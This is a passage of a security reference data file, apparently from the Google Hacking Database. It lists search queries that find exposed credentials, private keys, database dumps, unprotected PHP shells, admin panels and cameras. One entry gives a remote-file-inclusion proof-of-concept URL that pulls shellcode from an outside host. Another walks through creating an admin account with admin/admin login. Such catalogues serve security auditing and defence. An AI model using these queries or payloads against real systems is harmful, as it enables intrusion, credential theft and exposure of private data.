content, CGI scripts, and configuration files is controlled by entries in an access file. On Apache and NCSA Web servers the file is .htaccess, on Netscape servers it is .nsconfig.These files associate users, groups, and IP addresses with various levels of permissions: GET (read), POST (execute), PUT (write), and DELETE. For example, a FrontPage author would have permission to use HTTP POST commands (to save new content), and a user with browse permissions would be permitted to use HTTP GET commands (to read content).", "submited": "2004-06-18", "request": "allinurl:\".nsconfig\" -sample -howto -tutorial", "id": 290}, {"short description": "Outlook Web Access (a better way)", "long description": "According to Microsoft \"Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. \" Now, consider for a moment and you will understand why this could be potentially bad.", "submited": "2004-06-18", "request": "inurl:\"exchange/logon.asp\" OR intitle:\"Microsoft Outlook Web Access - Logon\"", "id": 291}, {"short description": "OWA Public folders &amp; Address book", "long description": "This search jumps right to the main page of Outlook Web Access Public Folders and the Exchange Address Book:.An attacker can use the addressbook to  enumerate usernames anonymously without having to logon. These usernames can then be used to guess the mailbox passwords. An attacker can also browse the public folders to gather extra information about the organisation.", "submited": "2004-06-19", "request": "inurl:root.asp?acs=anon", "id": 292}, {"short description": "Looking Glass", "long description": "A Looking Glass is a CGI script for viewing results of simple queries executed on remote routers. There are many Looking Glass sites all over the world. Some are password protected, many are not.An attacker use this to gather information about the network.", "submited": "2004-06-22", "request": "\"Looking Glass\"  (inurl:\"lg/\" | inurl:lookingglass)", "id": 293}, {"short description": "CGI:IRC Login", "long description": "CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else.", "submited": "2004-06-22", "request": "filetype:cgi inurl:\"irc.cgi\" | intitle:\"CGI:IRC Login\"", "id": 294}, {"short description": "filetype:ctt ctt messenger", "long description": "MSN Messenger uses the file extension *.ctt when you export the contact list. An attacker could use this for social enginering tricks.", "submited": "2004-06-22", "request": "filetype:ctt ctt messenger", "id": 295}, {"short description": "intitle:\"Error Occurred While Processing Request\" +WHERE (SELECT|INSERT) filetype:cfm", "long description": "Cold fusion error messages logging the SQL SELECT or INSERT statements and the location of the .cfm file on the webserver.An attacker could use this information to quickly find SQL injection points.", "submited": "2004-06-24", "request": "intitle:\"Error Occurred While Processing Request\"", "id": 296}, {"short description": "ht://Dig htsearch error", "long description": "The ht://Dig system is a complete world wide web indexing and searching system for a domain or intranet. A list of publically available sites that use ht://Dig is available at http://www.htdig.org/uses.htmlht://Dig 3.1.1 - 3.2 has a directory traversal and file view vulnerability as described at http://www.securityfocus.com/bid/1026. Attackers can read arbitrary files on the system. If the system is not vulnerable, attackers can still use the error produced by this search to gather information such as administrative email, validation of a cgi-bin executable directory, directory structure, location of a search database file and possible naming conventions.", "submited": "2004-06-24", "request": "intitle:\"htsearch error\" ht://Dig error", "id": 297}, {"short description": "VP-ASP Shopping Cart XSS", "long description": "VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.According to http://www.securityfocus.com/bid/9164/discussion/ a vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site.The vendor has released fixes to address this issue. It is reported that the fixes are applied to VP-ASP 5.0 as of February 2004. An attacker could also search Google for intitle:\"VP-ASP Shopping Cart *\" -\"5.0\" to find unpatched servers.", "submited": "2004-06-25", "request": "filetype:asp inurl:\"shopdisplayproducts.asp\"", "id": 298}, {"short description": "Unreal IRCd", "long description": "Development of UnrealIRCd began in 1999. Unreal was created from the Dreamforge IRCd that was formerly used by the DALnet IRC Network and is designed to be an advanced IRCd. Unreal can run on several operating systems. Unreal works on most *nix OSes including Linux, BSD, MacOS X, Solaris, and HP-UX. Unreal also works on Windows (95/98/ME NT4/2K/XP/2003).This search finds configuration files to Unreal IRCd. An attacker can use these to possibly determine the oper passwd. Be warned that there are samples in the results.", "submited": "2004-07-06", "request": "filetype:conf inurl:unrealircd.conf -cvs -gentoo", "id": 299}, {"short description": "OWA Public Folders (direct view)", "long description": "This search looks for Outlook Web Access Public Folders directly. These links open public folders or appointments. Of course there are more ways to find OWA, but the results from this search are different, it just depends which link Google has crawled.An attacker can often read all the messages anonymously or even post messages to the folders. In other cases a login will be required. This is a leak of confidential company information and may give hints for social enginering tricks.", "submited": "2004-06-25", "request": "inurl:/public/?Cmd=contents", "id": 300}, {"short description": "VP-ASP Shop Administrators only", "long description": "VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.It has been reported that the Shopping Cart Administration script is vulnerable to XSS and SQJ injection, resulting in exposure of confidential customer information like credit card details. More information on this attack is available at http://securitytracker.com/alerts/2002/May/1004384.html", "submited": "2004-06-25", "request": "inurl:\"shopadmin.asp\" \"Shop Administrators only\"", "id": 301}, {"short description": "Microsoft Money Data Files", "long description": "Microsoft Money 2004 provides a way to organize and manage your personal finances (http://www.microsoft.com/money/). The default file extension for the 'Money Data Files' is *.mny.A free trial version can be downloaded from MS. It is reported that the password protection (linked to passport in the new versions) for these data files can be cracked with a program called \"Passware\".", "submited": "2004-07-02", "request": "filetype:mny mny", "id": 302}, {"short description": "Environment vars", "long description": "This is a generic way of grabbing those CGI-spewed environmental var lists. To narrow to things down, an attacker could use any of the following: SERVER_SIGNATURE, SERVER_SOFTWARE, TNS_ADMIN, DOCUMENT_ROOT, etc.", "submited": "2004-07-02", "request": "HTTP_USER_AGENT=Googlebot", "id": 303}, {"short description": "MySQL tabledata dumps", "long description": "sQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper..... Note: this is a cleanup version of an older googledork entry.", "submited": "2004-07-06", "request": "\"# Dumping data for table (username|user|users|password)\"", "id": 304}, {"short description": "Welcome to ntop!", "long description": "Ntop shows the current network usage. It displays a list of hosts that are currently using the network and reports information concerning the IP (Internet Protocol) traffic generated by each host. An attacker may use this to gather information about hosts and services behind the firewall.", "submited": "2004-07-06", "request": "intitle:\"Welcome to ntop!\"", "id": 305}, {"short description": "vBulletin version 3.0.1 newreply.php XSS", "long description": "vBulletin is a customizable forums package for web sites. It has been written in PHP and is complimented with MySQL. While a user is previewing the post, both newreply.php and newthread.php correctly sanitize the input in 'Preview', but not Edit-panel. Malicious code can be injected by an attacker through this flaw. More information at http://www.securityfocus.com/bid/10612/.", "submited": "2004-07-02", "request": "\"Powered by: vBulletin * 3.0.1\"  inurl:newreply.php", "id": 306}, {"short description": "psyBNC config files", "long description": "psyBNC is an IRC-Bouncer with many features. It compiles on Linux, FreeBSD, SunOs and Solaris. The configuration file for psyBNC is called psybnc.conf (duh).An attacker can use the password, host and portinformation in this file to bounce his IRC connection through these bouncers, providing some privacy or just to show off some fancy irc hostname that are usually linked to those IP addresses.", "submited": "2004-07-06", "request": "filetype:conf inurl:psybnc.conf  \"USER.PASS=\"", "id": 307}, {"short description": "intitle:\"View and Configure PhaserLink\"", "long description": "These printer's configuration is wide open. Attackers can change just about any value through this control panel. Take it from FX, printers can be dangerous too! Besides, a POP3 server, username and password can be entered into these things! =)", "submited": "2004-07-08", "request": "intitle:\"View and Configure PhaserLink\"", "id": 308}, {"short description": "intext:\"Warning: Failed opening\" \"on line\" \"include_path\"", "long description": "These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths.", "submited": "2004-07-09", "request": "intext:\"Warning: Failed opening\" \"on line\" \"include_path\"", "id": 309}, {"short description": "filetype:php inurl:\"webeditor.php\"", "long description": "This is a standard login portal for the webadmin program.", "submited": "2004-07-09", "request": "filetype:php inurl:\"webeditor.php\"", "id": 310}, {"short description": "Panasonic Network Cameras", "long description": "Panasonic Network Cameras can be viewed and controlled from a standard web browser. These cameras can be placed anywhere to   keep an eye on things, with no PC required on the location. Check for more information: http://www.panasonic.com/netcam/There is a htaccess protected admin page at \"http://[target-ip]/config.html\" on the target device. Admin logins have no defaults, but created during setup.", "submited": "2004-07-10", "request": "inurl:\"ViewerFrame?Mode=\"", "id": 311}, {"short description": "sony SNC-RZ30 Network Cameras", "long description": "sony NC RZ30 camera's require a java capable browser. The admin panel is found at http://[sitename]/home/l4/admin.html.", "submited": "2004-07-10", "request": "sNC-RZ30 HOME", "id": 312}, {"short description": "seyeon FlexWATCH cameras", "long description": "seyeon provides various type of products and software to build up a remote video monitoring and surveillance system over the TCP/IP network. FlexWATCH Network video server series has built-in Web server based on TCP/IP technology. It also has an embedded RTOS.The admin pages are at http://[sitename]/admin/aindex.htm.", "submited": "2004-07-10", "request": "intitle:flexwatch intext:\"Home page ver\"", "id": 313}, {"short description": "sony SNC-RZ20 network cameras", "long description": "sony NC RZ20 cameras, only one result for this cam at the moment, a nice street view from a skyscraper.", "submited": "2004-07-10", "request": "intitle:snc-z20 inurl:home/", "id": 314}, {"short description": "Mobotix netcams", "long description": "Mobotix netcams use the thttpd-2.x. server (http://www.acme.com/software/thttpd/). The latest version today is 2.25b, but most cams run older versions. They produce a rather nice image quality.Moderator note: this search was found by L0om and cleaned up by Wolveso.", "submited": "2004-07-10", "request": "(intext:\"MOBOTIX M1\" | intext:\"MOBOTIX M10\") intext:\"Open Menu\" Shift-Reload", "id": 315}, {"short description": "Panasonic WJ-NT104 netcams", "long description": "The Panasonic WJ-NT104 allows easy monitoring with a conventional browser. More vendor information is available at hxxp://www.panasonic.ca/English/Broadcast/security/transmission/wjnt104.asp", "submited": "2004-07-10", "request": "intitle:\"WJ-NT104 Main Page\"", "id": 316}, {"short description": "exported email addresses", "long description": "Loads of user information including email addresses exported in comma separated file format (.cvs). This information may not lead directly to an attack, but most certainly counts as a serious privacy violation.", "submited": "2004-07-12", "request": "e-mail address filetype:csv csv", "id": 317}, {"short description": "phpWebMail", "long description": "PhpWebMail is a php webmail system that supports imap or pop3.    It has been reported that PHPwebmail 2.3 is vulnerable. The vulnerability allows phpwebmail users to gain access to arbitrary file system by changing the parameters in the URL used for sending mail (send_mail.php). More info at http://eagle.kecapi.com/sec/fd/phpwebmail.html.", "submited": "2004-07-12", "request": "filetype:php login (intitle:phpWebMail|WebMail)", "id": 318}, {"short description": "Invision Power Board SSI.PHP SQL Injection", "long description": "Invision Power Board is reported prone to an SQL injection vulnerability in its ssi.php script. Due to improper filtering of user supplied data, ssi.php is exploitable by attackers to pass SQL statements to the underlying database. The impact of this vulnerability depends on the underlying database. It may be possible to corrupt/read sensitive data, execute commands/procedures on the database server or possibly exploit vulnerabilities in the database itself through this condition. Version 1.3.1 Final of Invision Power Board is reported vulnerable. Other versions may also be affected as well.More info: http://www.securityfocus.com/bid/10511/info/", "submited": "2004-07-12", "request": "\"Powered by Invision Power Board(U) v1.3 Final\"", "id": 319}, {"short description": "Analysis Console for Incident Databases", "long description": "ACID stands for for \"Analysis Console for Incident Databases\". It is a php frontend for the snort intrusion detection system database.These pages can be used by attackers to view network attacks that have occurred against the target. Using this information, an attacker can craft an attack and glean network information including vulnerabilities, open ports, ip addresses, network layout, existance of firewall and IDS systems, and more.", "submited": "2004-07-12", "request": "ACID \"by Roman Danyliw\" filetype:php", "id": 320}, {"short description": "Index of phpMyAdmin", "long description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields (http://sourceforge.net/projects/phpmyadmin/).An attacker can use this search to find phpMyAdmin enabled MySQL servers by using the \"index of /\" method. Consider this an alternative way an attacker could find them besides the older Googledorks for phpMyAdmin.", "submited": "2004-07-12", "request": "intitle:\"index of /phpmyadmin\" modified", "id": 321}, {"short description": "Comersus.mdb database", "long description": "Comersus is an e-commerce system and has been installed all over the world in more than 20000 sites. Using Comersus does not require that you know any programming language. BackOffice+ allows you to define virtually all properties of your on-line store through an intuitive, point-&amp;-click interface.This search goes directly for one of the MS Access files used by the shopping cart. Searching Google and the well know security sites for Comersus reveals more security problems.", "submited": "2004-07-12", "request": "inurl:\"/database/comersus.mdb\"", "id": 322}, {"short description": "Public PHP FileManagers", "long description": "PHPFM is an open source file manager written in PHP. It is easy to set up for a beginner, but still easy to customize for the more experienced user. The built-in login system makes sure that only people with the right username and password gains access to PHPFM, however, you can also choose to disable the login system and use PHPFM for public access. It can currently: create, rename and delete folders; create, upload, rename, download and delete files; edit text files; view image files; sort files by name, size, permissions and last modification date both ascending and descending; communicate in more languages. This search finds those \"public\" versions of PHPFM. An attacker can use them to manage his own files (phpshell anyone ?).PS: thanks to j0hnny for the public access angle :)", "submited": "2004-07-12", "request": "\"Powered by PHPFM\" filetype:php -username", "id": 323}, {"short description": "private key files (.key)", "long description": "This search will find private key files... Private key files are supposed to be, well... private.", "submited": "2004-07-12", "request": "BEGIN (CERTIFICATE|DSA|RSA) filetype:key", "id": 324}, {"short description": "inurl:explorer.cfm inurl:(dirpath|This_Directory)", "long description": "Filemanager without authentication.", "submited": "2004-10-31", "request": "inurl:explorer.cfm inurl:(dirpath|This_Directory)", "id": 325}, {"short description": "private key files (.csr)", "long description": "This search will find private key files... Private key files are supposed to be, well... private.", "submited": "2004-07-12", "request": "BEGIN (CERTIFICATE|DSA|RSA) filetype:csr", "id": 326}, {"short description": "PHP Shell (unprotected)", "long description": "PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbiritary shell-commands or browse the filesystem on your remote Web server. This replaces, to a degree, a normal telnet-connection. You can use it for administration and maintenance of your Web site using commands like ps, free, du, df, and more.If these shells aren't protected by some form of authentication, an attacker will basicly *own* the server. This search finds such unprotected phpshells by looking for the keyword \"enable stderr\".", "submited": "2004-07-12", "request": "intitle:\"PHP Shell *\" \"Enable stderr\" filetype:php", "id": 327}, {"short description": "NickServ registration passwords", "long description": "NickServ allows you to \"register\" a nickname (on some IRC networks) and prevent others from using it. Some channels also require you to use a registered nickname to join.This search contains the the nickserv response message to a nick registration. Lots of example sites, but some that aren't... you can see which ones are fake or not in the search (some are like, your_password, while other are more realistic ones).", "submited": "2004-07-12", "request": "\"Your password is * Remember this for later use\"", "id": 328}, {"short description": "Red Hat Unix Administration", "long description": "Red Hat UNIX Administration Pages. This search detects the fixed title for the admin pages on certain Red Hat servers. A login is required to access them, but an attacker could use this search to determine the operating system used by the server.", "submited": "2004-07-12", "request": "intitle:\"Page rev */*/*\" inurl:\"admin", "id": 329}, {"short description": "inurl:ssl.conf filetype:conf", "long description": "The information contained in these files depends on the actual file itself. SSL.conf files contain port numbers, ssl data, full path names, logging information, location of authentication files, and more. Other conf files based on this name may contain similar information. Attackers can use this information against a target in various ways.", "submited": "2004-07-15", "request": "inurl:ssl.conf filetype:conf", "id": 330}, {"short description": "PHP application warnings failing \"include_path\"", "long description": "These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths.PS: thanks to fr0zen for correcting the google link for this dork (murfie, 24 jan 2006).", "submited": "2004-07-14", "request": "PHP application warnings failing \"include_path\"", "id": 331}, {"short description": "\"Internal Server Error\" \"server at\"", "long description": "We have a similar search already, but it relies on \"500 Internal Server\" which doesn't appear on all errors like this one. It reveals the server administrator's email address, as well as a nice server banner for Apache servers. As a bonus, the webmaster may have posted this error on a forum which may reveal (parts of) the source code.", "submited": "2004-07-16", "request": "\"Internal Server Error\" \"server at\"", "id": 332}, {"short description": "inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man", "long description": "LILO is a general purpose boot manager that can be used to boot multiple operating systems, including Linux. The normal configuration file is located in /etc/lilo.conf. Each bootable image can be protected by a password if needed. Please note that all searches for configuration files will contain at least some false positives.", "submited": "2004-07-16", "request": "inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man", "id": 333}, {"short description": "filetype:php inurl:\"logging.php\" \"Discuz\" error", "long description": "Discuz! Board error messages related to MySQL. The error message may be empty or contain path information or the offending SQL statement. All discuz! board errors seem to be logged by this php file.An attacker can use this to reveal parts of the database and possibly launch a SQL attack (by filtering this search including SELECT or INSERT statements).", "submited": "2004-07-16", "request": "filetype:php inurl:\"logging.php\" \"Discuz\" error", "id": 334}, {"short description": "intitle:\"Microsoft Site Server Analysis\"", "long description": "Microsoft discontinued Site Server and Site Server Commerce Edition on June 1, 2001 with the increasing adoption of its successor, Microsoft Commerce Server 2000 Server and Microsoft Commerce Server 2002. There are still some installations online however. An attacker may use these reports to gather information about the directory structure and possibly identify script files.", "submited": "2004-07-16", "request": "intitle:\"Microsoft Site Server Analysis\"", "id": 335}, {"short description": "intitle:\"Index of\" passwords modified", "long description": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This is a cleanup of a previous googledork, improving the results by using \"intitle\" and an extra keyword from the index page (in this case modified).", "submited": "2004-07-16", "request": "intitle:\"Index of\" passwords modified", "id": 336}, {"short description": "index.of.password", "long description": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This googledork has expired ! See also:http://johnny.ihackstuff.com/index.php?module=ProdReviews&amp;func=showcontent&amp;id=380", "submited": "2004-07-16", "request": "index.of.password", "id": 337}, {"short description": "\"powered by webcamXP\" \"Pro|Broadcast\"", "long description": "webcamXP PRO:http://www.webcamxp.com/productsadv.htmlThis is the most advanced version of the software. It has all the features of the other versions (including advanced users management, motion detector, and alerts manager) plus remote administration and external server notification when going offline/online.", "submited": "2004-07-16", "request": "\"powered by webcamXP\" \"Pro|Broadcast\"", "id": 338}, {"short description": "\"powered by sphider\" -exploit -ihackstuff -www.cs.ioc.ee", "long description": "dork: \"powered by sphider\" a vulnerable search engine script arbitrary remote inclusion, poc: http://[target]/[path]/admin/configset.php?cmd=ls%20-la&amp;settings_dir=http://somehost.com where on somehost.com you have a shellcode in /conf.php/index.html references:http://retrogod.altervista.org/sphider_13_xpl_pl.htmlhttp://secunia.com/advisories/19642/", "submited": "2006-04-15", "request": "\"powered by sphider\" -exploit -ihackstuff -www.cs.ioc.ee", "id": 339}, {"short description": "\"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\"", "long description": "dork: \"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\" this is for PHP Web Statistik script, you can go to: http://[target]/[path_to]/log/logdb.dta to see clear text logs", "submited": "2006-04-15", "request": "\"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\"", "id": 340}, {"short description": "\"ORA-12541: TNS:no listener\" intitle:\"error occurred\"", "long description": "In many cases, these pages display nice bits of SQL code which can be used by an attacker to mount attacks against the SQL database itself. Other pieces of information revealed include path names, file names, and data sources.", "submited": "2004-07-16", "request": "\"ORA-12541: TNS:no listener\" intitle:\"error occurred\"", "id": 341}, {"short description": "intitle:\"Live View / - AXIS\"", "long description": "These AXIS cams seem to run their own http server (Boa/0.94.13). The setup button can be hidden. The devices ship with a default password pair (quoting from the FAQ): \"By default, the username will be *knowed* and the password will be *knowed* (see original source). If these are not the current values, performing a factory default on the unit will reset the password to *knowed*.\"Some models found in this search:- AXIS 205 version 4.0x- AXIS 210 Network Camera version: 4.0x- AXIS 241S Video Server version: 4.0x- AXIS 241Q Video Server version 4.0x", "submited": "2004-07-19", "request": "intitle:\"Live View / - AXIS\"", "id": 342}, {"short description": "\"sets mode: +p\"", "long description": "This search reveals private channels on IRC as revealed by IRC chat logs.", "submited": "2004-07-19", "request": "\"sets mode: +p\"", "id": 343}, {"short description": "\"sets mode: +k\"", "long description": "This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.", "submited": "2004-07-19", "request": "\"sets mode: +k\"", "id": 344}, {"short description": "\"sets mode: +s\"", "long description": "This search reveals secret channels on IRC as revealed by IRC chat logs.", "submited": "2004-07-19", "request": "\"sets mode: +s\"", "id": 345}, {"short description": "intitle:\"BorderManager Information alert\"", "long description": "This is an Informational message produced by the Novell BorderManager firewall/proxy server. Attackers can located perimeter defence systems with this query.", "submited": "2004-07-19", "request": "intitle:\"BorderManager Information alert\"", "id": 346}, {"short description": "\"AnWeb/1.42h\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"AnWeb/1.42h\" intitle:index.of", "id": 347}, {"short description": "\"CERN httpd 3.0B (VAX VMS)\"", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"CERN httpd 3.0B (VAX VMS)\"", "id": 348}, {"short description": "\"JRun Web Server\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"JRun Web Server\" intitle:index.of", "id": 349}, {"short description": "\"MaXX/3.1\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"MaXX/3.1\" intitle:index.of", "id": 350}, {"short description": "\"Microsoft-IIS/* server at\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"Microsoft-IIS/* server at\" intitle:index.of", "id": 351}, {"short description": "\"Microsoft-IIS/4.0\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"Microsoft-IIS/4.0\" intitle:index.of", "id": 352}, {"short description": "\"Microsoft-IIS/5.0 server at\"", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"Microsoft-IIS/5.0 server at\"", "id": 353}, {"short description": "\"Microsoft-IIS/6.0\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"Microsoft-IIS/6.0\" intitle:index.of", "id": 354}, {"short description": "\"OmniHTTPd/2.10\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"OmniHTTPd/2.10\" intitle:index.of", "id": 355}, {"short description": "\"OpenSA/1.0.4\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"OpenSA/1.0.4\" intitle:index.of", "id": 356}, {"short description": "\"Red Hat Secure/2.0\"", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"Red Hat Secure/2.0\"", "id": 357}, {"short description": "\"Red Hat Secure/3.0 server at\"", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"Red Hat Secure/3.0 server at\"", "id": 358}, {"short description": "sEDWebserver * server +at intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "sEDWebserver * server +at intitle:index.of", "id": 359}, {"short description": "fitweb-wwws * server at intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "fitweb-wwws * server at intitle:index.of", "id": 360}, {"short description": "\"httpd+ssl/kttd\" * server at intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"httpd+ssl/kttd\" * server at intitle:index.of", "id": 361}, {"short description": "Xerox Phaser 6250", "long description": "Base Specifications Phaser 6250N: Letter/Legal Size Color Printer 110V, 26ppm Color/B&amp;W (24ppm A4 Color/B&amp;W), 2400dpi, 700MHz Processor, Ethernet, 256MB Memory, Photo Quality Mode, Network Feature SetPassword not allways needed it seems, depends on admin setup..", "submited": "2004-07-22", "request": "\"Phaser 6250\" \"Printer Neighborhood\" \"XEROX CORPORATION\"", "id": 362}, {"short description": "Xerox Phaser 740 Color Printer", "long description": "This product is supported but no longer sold by Xerox in the United States. Replacement Product: Phaser (see in orig) 6250.Configuration pages are password protected.", "submited": "2004-07-22", "request": "\"Phaser 740 Color Printer\" \"printer named: \"", "id": 363}, {"short description": "Xerox Phaser 8200", "long description": "Brochure info: \"The Phaser 8200 uses solid ink, an alternative technology to laser printing. Unlike typical laser printers, solid ink doesn't require throwaway cartridges to get ink in the printer.\" Using the Internet, your printer can send performance information to our computers. PhaserSMART, our diagnostic system, examines the information, diagnoses the issue, and immediately walks you through a proposed solution. Automatic alerts minimize printer management problems. Alerts notify you via email when it's time to replace supplies, or when service is required.\"Moderator note: you may not be able to connect to the links Google gives if the printers are turned off when not in use.", "submited": "2004-07-22", "request": "\"Phaser 8200\" \" Xerox\" \"refresh\" \" Email Alerts\"", "id": 364}, {"short description": "Xerox Phaser 840 Color Printer", "long description": "This product is supported but no longer sold by Xerox in the United States. Support and supplies for this product continue to be available online. Replacement Product: Phaser 8400 This search finds the PhaserLinkTM Printer Management Software for the Phaser 840 Color Printer. It seems at least the \"Print DEMO\" page works without authentication.", "submited": "2004-07-22", "request": "\"Phaser 840 Color Printer\" \"Current Status\" \"printer named:\"", "id": 365}, {"short description": "\"index of\" / picasa.ini", "long description": "Picasa is an 'Automated Digital Photo Organizer' recently aquired by Google. This search allows the voyer to browse directories of photos uploaded using the picasa software.", "submited": "2004-07-20", "request": "\"index of\" / picasa.ini", "id": 366}, {"short description": "\"adding new user\" inurl:addnewuser -\"there are no domains\"", "long description": "Allows an attacker to create an account on a server running Argosoft mail server pro for windows with unlimited disk quota (but a 5mb per message limit should you use your account to send mail).", "submited": "2004-07-20", "request": "\"adding new user\" inurl:addnewuser -\"there are no domains\"", "id": 367}, {"short description": "intitle:\"index of\" +myd size", "long description": "The MySQL data directory uses subdirectories for each database and common files for table storage. These files have extensions like: .myd, .myi or .frm. An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database.", "submited": "2004-07-21", "request": "intitle:\"index of\" +myd size", "id": 368}, {"short description": "filetype:cnf my.cnf -cvs -example", "long description": "The MySQL database system uses my.cnf files for configuration. It can include a lot of information, ranging from pathes, databasenames up to passwords and usernames.Beware this search still gives false positives (examples, templates).", "submited": "2004-07-21", "request": "filetype:cnf my.cnf -cvs -example", "id": 369}, {"short description": "(\"Indexed.By\"|\"Monitored.By\") hAcxFtpScan", "long description": "hAcxFtpScan - software that use 'l33t h@x0rz' to monitor their file stroz on ftp. On the ftp server usualy it is a directory like:/Monitored.By.hAcxFtpScan//Indexed.By.hAcxFtpScan/These are tagged, hacked, rooted and filled servers, in wich pplz from forums or irc channels (in most cases, usuasly private) share filez (yes yes p2p suxz)And again thnxz goo 4 help us to find it.", "submited": "2004-07-26", "request": "(\"Indexed.By\"|\"Monitored.By\") hAcxFtpScan", "id": 370}, {"short description": "inurl:email filetype:mdb", "long description": "Microsoft Access databases containing email information..", "submited": "2004-07-26", "request": "inurl:email filetype:mdb", "id": 371}, {"short description": "Powered by INDEXU", "long description": "From the sales department: \"INDEXU is a portal solution software that allows you to build powerful Web Indexing Sites such as yahoo.com, google.com, and dmoz.org with ease. It's ability to allow you and your members to easily add, organize, and manage your links makes INDEXU the first choice of all webmasters.\"(Moderator note: don't believe the marketing talk..)Some of these servers are not protected well enough. It has been reported that on (rare) occosions this page -&gt;http://[indexuserver]/recovery_tools/create_admin_user.phpindicates admin login is possible by the appearance of three text lines:Create Administrator LoginDelete old administrator user ....okCreate new administrator user ....okAn attacker can then change the URL to http://[target]/admin/index.php and enter:user=adminpass=admin But that's if you find them..", "submited": "2004-07-22", "request": "+\"Powered by INDEXU\" inurl:(browse|top_rated|power", "id": 372}, {"short description": "data filetype:mdb -site:gov -site:mil", "long description": "Microsoft Access databases containing all kinds of 'data'.", "submited": "2004-07-26", "request": "data filetype:mdb -site:gov -site:mil", "id": 373}, {"short description": "inurl:backup filetype:mdb", "long description": "Microsoft Access database backups..", "submited": "2004-07-26", "request": "inurl:backup filetype:mdb", "id": 374}, {"short description": "inurl:forum filetype:mdb", "long description": "Microsoft Access databases containing 'forum' information ..", "submited": 